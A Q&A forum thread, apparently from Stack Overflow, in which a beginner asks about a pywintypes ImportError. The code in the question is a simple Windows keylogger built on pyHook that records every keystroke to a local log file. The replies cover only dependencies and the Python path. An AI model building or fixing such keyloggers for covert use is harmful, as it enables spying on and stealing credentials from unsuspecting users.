# How can I fix this Import Error and what has gone wrong?

Tags: python, import

Whenever I try to run my python code this Import Error occurs, I am relatively new to python and was wondering what was the most efficient way to fix it and why is it happening in the first place?

```
Traceback (most recent call last):
  File "C:/Users/Admin/Documents/1 Tor/logger.py", line 2, in <module>
    import pythoncom
  File "C:\Python34\lib\site-packages\pythoncom.py", line 2, in <module>
    import pywintypes
  File "C:\Python34\lib\site-packages\win32\lib\pywintypes.py", line 124, in <module>
    __import_pywin32_system_module__("pywintypes", globals())
  File "C:\Python34\lib\site-packages\win32\lib\pywintypes.py", line 98, in __import_pywin32_system_module__
    raise ImportError("No system module '%s' (%s)" % (modname, filename))
ImportError: No system module 'pywintypes' (pywintypes34.dll)
```

This is my original code:

```
import pyHook
import pythoncom
import sys
import logging

file_log = 'C:\\Users\\Admin\\Documents\\1 Tor\\log.txt'

def OnKeyboardEvent(event):
    logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%    (message)s')
    chr(event.Ascii)
    logging.log(10,chr(event.Ascii))
    return True

hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent()
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
```

Comment: "Whenever I try to run my python code"? I don't see any code...

Comment: Sorry, this is my first time using this website so im still not fully familiar with how it works. I have added it now.

Comment: Please read about MCVEs, https://stackoverflow.com/help/mcve.  In this case, `import pythoncom` is sufficient.

Comment: How did you install pythoncom?  If installed with `pip`, the dependencies, including pywintypes, should have been installed also.  If you did use `pip`, was there an error message?

Answer (score 0):

**pythoncom** requires a package named **pywintypes**, which isn't yet installed.  You'll need to download and install that.  Since you're missing one package, you may be missing others.  Check the **pythoncom** documentation to see whether there is a list of dependencies that you have to install first.

Comment: Thankyou, ill check to find pywintypes, I thought it had already been installed with pythoncom thought. There was no error with pip and a file does already exist in my directories called pywintypes.py

Comment: In that case, check to make sure that the directory containing the support packages is in your Python search path.  That's a lesser-known environment variable that *should* get updated without your intervention, but I've seen two other questions on SO where setting it was the solution.

Comment: Ok, I'll edit the path and hopefully thay should fix the issue. Thanks for the help.